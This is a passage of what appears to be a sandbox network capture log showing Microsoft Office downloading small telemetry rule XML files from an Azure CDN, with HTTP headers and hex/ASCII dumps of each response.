                2024-10-07 01:26:51 UTC404INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4d 6d 5d 5b 53 73 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120641" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120639" /> <SR T="2" R="^([Mm][Ss][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S


                Session IDSource IPSource PortDestination IPDestination Port
                43192.168.2.44978913.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:51 UTC192OUTGET /rules/rule120642v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:51 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:51 GMT
                Content-Type: text/xml
                Content-Length: 468
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:24 GMT
                ETag: "0x8DC582BB046B576"
                x-ms-request-id: db28b7eb-d01e-0065-5efe-16b77a000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012651Z-1657d5bbd482tlqpvyz9e93p5400000002wg00000000brn3
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:51 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                44192.168.2.44979113.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:51 UTC192OUTGET /rules/rule120644v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:51 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:51 GMT
                Content-Type: text/xml
                Content-Length: 479
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                ETag: "0x8DC582BB7D702D0"
                x-ms-request-id: b2c548d6-d01e-0082-4f03-17e489000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012651Z-1657d5bbd48sdh4cyzadbb374800000002n000000000c3k1
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:51 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                45192.168.2.44979013.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:51 UTC192OUTGET /rules/rule120643v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:51 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:51 GMT
                Content-Type: text/xml
                Content-Length: 400
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                ETag: "0x8DC582BB2D62837"
                x-ms-request-id: 53f69819-801e-0048-7802-17f3fb000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012651Z-1657d5bbd48jwrqbupe3ktsx9w00000002wg00000000v1ye
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:51 UTC400INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4c 6c 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120643" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <SR T="2" R="^([Ll][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S T="


                Session IDSource IPSource PortDestination IPDestination Port
                46192.168.2.44979313.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:51 UTC192OUTGET /rules/rule120645v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:52 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:52 GMT
                Content-Type: text/xml
                Content-Length: 425
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                ETag: "0x8DC582BBA25094F"
                x-ms-request-id: 7709e3c3-b01e-0097-5e02-174f33000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012652Z-1657d5bbd48p2j6x2quer0q02800000002y000000000h8cu
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:52 UTC425INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 4d 6d 5d 5b 41 61 5d 5b 5a 7a 5d 5b 4f 6f 5d 5b 4e 6e 5d 20 5b 45 65 5d 5b 43 63 5d 32 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120645" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <SR T="2" R="([Aa][Mm][Aa][Zz][Oo][Nn] [Ee][Cc]2)"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I=


                Session IDSource IPSource PortDestination IPDestination Port
                47192.168.2.44979413.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:52 UTC192OUTGET /rules/rule120646v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:52 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:52 GMT
                Content-Type: text/xml
                Content-Length: 475
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:28 GMT
                ETag: "0x8DC582BB2BE84FD"
                x-ms-request-id: c5dbf9be-001e-0017-2cf1-160c3c000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012652Z-1657d5bbd487nf59mzf5b3gk8n000000029g00000000v3a5
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:52 UTC475INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120646" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                48192.168.2.44979713.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:52 UTC192OUTGET /rules/rule120649v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:52 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:52 GMT
                Content-Type: text/xml
                Content-Length: 416
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:21 GMT
                ETag: "0x8DC582BAEA4B445"
                x-ms-request-id: cb78c1b2-201e-003f-2e04-176d94000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012652Z-1657d5bbd48762wn1qw4s5sd3000000002s000000000202e
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:52 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 46 66 5d 5b 45 65 5d 5b 44 64 5d 5b 4f 6f 5d 5b 52 72 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120649" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <SR T="2" R="^([Ff][Ee][Dd][Oo][Rr][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                Session IDSource IPSource PortDestination IPDestination Port
                49192.168.2.44979513.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:52 UTC192OUTGET /rules/rule120647v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:52 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:52 GMT
                Content-Type: text/xml
                Content-Length: 448
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT
                ETag: "0x8DC582BB389F49B"
                x-ms-request-id: 5a5a1e5c-a01e-001e-18f5-1649ef000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012652Z-1657d5bbd48q6t9vvmrkd293mg00000002qg00000000mz2d
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:52 UTC448INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 41 61 5d 5b 50 70 5d 5b 41 61 5d 5b 43 63 5d 5b 48 68 5d 5b 45 65 5d 20 5b 53 73 5d 5b 4f 6f 5d 5b 46 66 5d 5b 54 74 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120647" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120645" /> <SR T="2" R="([Aa][Pp][Aa][Cc][Hh][Ee] [Ss][Oo][Ff][Tt][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR>


                Session IDSource IPSource PortDestination IPDestination Port
                50192.168.2.44979613.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:52 UTC192OUTGET /rules/rule120648v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:52 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:52 GMT
                Content-Type: text/xml
                Content-Length: 491
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                ETag: "0x8DC582B98B88612"
                x-ms-request-id: 721d8bd8-801e-002a-4f00-1731dc000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012652Z-1657d5bbd48qjg85buwfdynm5w00000002y0000000006c72
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:52 UTC491INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120648" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120647" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                51192.168.2.44979813.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:52 UTC192OUTGET /rules/rule120650v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:52 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:52 GMT
                Content-Type: text/xml
                Content-Length: 479
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                ETag: "0x8DC582B989EE75B"
                x-ms-request-id: 27b6de9f-001e-0046-1e00-17da4b000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012652Z-1657d5bbd482tlqpvyz9e93p5400000002x0000000009myw
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:52 UTC479INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120650" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                52192.168.2.44979913.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:52 UTC192OUTGET /rules/rule120651v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:52 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:52 GMT
                Content-Type: text/xml
                Content-Length: 415
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:26:10 GMT
                ETag: "0x8DC582BA80D96A1"
                x-ms-request-id: cc92db4a-701e-0053-3460-173a0a000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012652Z-1657d5bbd48sqtlf1huhzuwq7000000002e000000000saye
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:52 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 47 67 5d 5b 4c 6c 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120651" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120649" /> <SR T="2" R="([Gg][Oo][Oo][Gg][Ll][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                Session IDSource IPSource PortDestination IPDestination Port
                53192.168.2.44980013.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:52 UTC192OUTGET /rules/rule120652v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:52 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:52 GMT
                Content-Type: text/xml
                Content-Length: 471
                Connection: close
                Cache-Control: public, max-age=604800, immutable
                Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                ETag: "0x8DC582B97E6FCDD"
                x-ms-request-id: 2f3972b1-401e-0035-1b02-1782d8000000
                x-ms-version: 2018-03-28
                x-azure-ref: 20241007T012652Z-1657d5bbd482krtfgrg72dfbtn00000002g000000000gsfb
                x-fd-int-roxy-purgeid: 0
                X-Cache: TCP_HIT
                Accept-Ranges: bytes
                2024-10-07 01:26:52 UTC471INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120652" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120651" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                Session IDSource IPSource PortDestination IPDestination Port
                54192.168.2.44980113.107.246.60443
                TimestampBytes transferredDirectionData
                2024-10-07 01:26:52 UTC192OUTGET /rules/rule120653v0s19.xml HTTP/1.1
                Connection: Keep-Alive
                Accept-Encoding: gzip
                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                Host: otelrules.azureedge.net
                2024-10-07 01:26:52 UTC470INHTTP/1.1 200 OK
                Date: Mon, 07 Oct 2024 01:26:52 GMT
                Content-Type: text/xml
                Content-Length: 419
                Connection: close
                Cache-Control: public, max-age=604800, immutable
